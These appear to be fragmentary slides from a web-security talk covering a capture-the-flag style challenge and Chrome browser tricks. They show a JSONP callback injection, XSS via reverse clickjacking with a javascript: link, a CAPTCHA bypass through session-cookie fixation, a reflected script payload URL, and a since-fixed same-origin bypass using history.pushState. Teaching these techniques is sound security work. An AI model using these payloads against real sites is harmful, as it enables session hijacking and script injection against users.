19. DT_VCS
#1. JSONP callback spoofing
/colorer.php?callback=loadCode&code=code&la
ng=php
Trying to set lang value to “&callback=alert”…
20. DT_VCS
#2. XSS via Revese Clickjacking.
Post link like:
“javascript:alert('PWN')”
And callback like:
”document.body.firstChild.firstChild.nextSibling.firstChild.next
Sibling.firstChild.click”
25. DT_VCS
Seems like PHPSESSID used for storing correct CAPTCHA
value. So if we set our PHPSESSID cookie in admin
browser, we could know the correct captcha value.
40. Chrome tricks
And if we try something like that
http://i_can_decode_something_like_this_"@pw
ny.in/reflector.php?data=<script>document.write(loc
ation)</script>
42. Chrome tricks
And now we need to bypass this:
if (XSS.sanitizeURL(location.href) !== location.href) {
location = 'about:blank';
}
How it’s possible?
44. Chrome tricks
The main idea of SOP Bypass very simple - just execute
history.pushState with context of another page like
this:
history.pushState.apply(
frames[1].history,
['','',payloaded_url]
);
// Fixed now